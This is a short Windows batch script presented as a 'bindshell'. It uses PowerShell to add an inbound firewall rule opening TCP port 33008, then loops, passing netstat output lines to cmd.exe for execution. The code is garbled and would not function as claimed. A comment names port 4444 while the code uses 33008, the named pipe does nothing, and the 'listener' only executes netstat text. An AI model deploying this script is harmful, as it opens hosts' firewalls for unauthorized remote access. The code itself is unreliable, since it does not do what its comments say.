@echo off
setlocal enabledelayedexpansion

:loop
REM Create a named pipe for communication
set "pipe=\\.\pipe\bindshell"
echo %pipe% > nul

REM Start the server
powershell -Command "New-NetFirewallRule -Name 'BindShell' -DisplayName 'BindShell' -Action Allow -Direction Inbound -Protocol TCP -LocalPort 33008"

REM Listen on port 4444 and execute commands
:listen
for /f "tokens=*" %%a in ('powershell -Command "netstat -an | findstr LISTENING | findstr 33008"') do (
    powershell -Command "cmd.exe /c '%%a'"
)
goto listen

REM If we reach here, something went wrong. Restart after delay
echo Error occurred. Restarting in 5 seconds...
timeout /t 5 /nobreak > nul
goto loop
